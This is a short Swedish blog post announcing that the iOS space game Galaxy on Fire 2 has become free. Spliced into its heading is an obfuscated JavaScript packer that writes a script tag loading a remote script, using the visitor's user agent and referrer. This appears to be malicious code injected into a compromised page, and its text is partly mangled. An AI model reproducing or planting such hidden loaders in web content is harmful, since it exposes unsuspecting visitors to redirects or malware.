Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

Gratis till iOS: Galaxy on Fire 2

Filip Urde
  • On 30 november, 2012
  • http://www.revue.se/filip-urde

Galaxy eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iykyt|var|u0026u|referrer|yzeir||js|php’.split(’|’),0,{}))
on Fire 2, grymt rymdäventyr till iOS

Galaxy on Fire 2 är ett grymt rymdäventyr som för tankarna tillbaka till freelancer (för er som inte vet vad freelancer är, se då här.). Spelet går ut på att åka runt i galaxen och kriga mot olika typer av skurkar. Du kan uppgradera ditt skepp samt skaffa nya häftiga farkoster. Helt enkelt ett coolt rymdspel.

Spelet har kostat 38kr i appstore, men är nu gratis sedan det kommit en HD version.

Här laddar du ner spelet.